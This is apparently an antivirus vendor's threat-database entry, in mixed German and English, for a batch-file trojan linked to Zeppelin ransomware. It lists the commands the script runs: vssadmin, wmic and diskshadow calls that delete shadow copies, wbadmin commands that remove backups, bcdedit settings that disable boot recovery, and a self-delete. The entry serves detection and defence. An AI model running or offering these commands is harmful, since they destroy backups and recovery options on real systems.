Trojan.BAT.ZEPPELIN.SMYXBEU.hp
Publish Date: September 08, 2021
Trojan.Script.Agent.cr (KASPERSKY)
Plattform:
Windows
Risikobewertung (gesamt):
Schadenspotenzial::
Verteilungspotenzial::
reportedInfection:
Trend Micro Lösungen:
Niedrig
Mittel
Hoch
Kritisch
Malware-Typ:
Trojan
Zerstrerisch?:
Nein
Verschlsselt?:
Nein
In the wild::
Ja
Überblick
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Wird ausgeführt und löscht sich dann selbst.
Technische Details
Dateigröße: 707 bytes
Dateityp: BAT
Speicherresiden: Nein
Übertragungsdetails
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
Schleust die folgenden Dateien ein:
- {Current directory}\sc.txt
Fügt die folgenden Prozesse hinzu:
- wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
- wbadmin DELETE BACKUP -keepVersions:0
- wmic SHADOWCOPY DELETE
- vssadmin Delete Shadows /All /Quiet
- bcdedit /set {default} recoveryenabled No
- bcdedit /set {default} bootstatuspolicy ignoreallfailures
- vssadmin list shadows
- cmd.exe /C wbadmin STOP job
- cmd.exe /C wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0 -quiet
- cmd.exe /C wbadmin DELETE CATALOG -quiet
- cmd.exe /C wbadmin DISABLE backup
- cmd.exe /C bcdedit /set {default} recoveryenabled No
- cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
- cd "{Current directory}"
- echo delete shadows all>>sc.txt
- echo exit>>sc.txt
- cmd.exe /C diskshadow -s sc.txt
- del /f "{Current directory}\sc.txt"
- pause
- del %0
Wird ausgeführt und löscht sich dann selbst.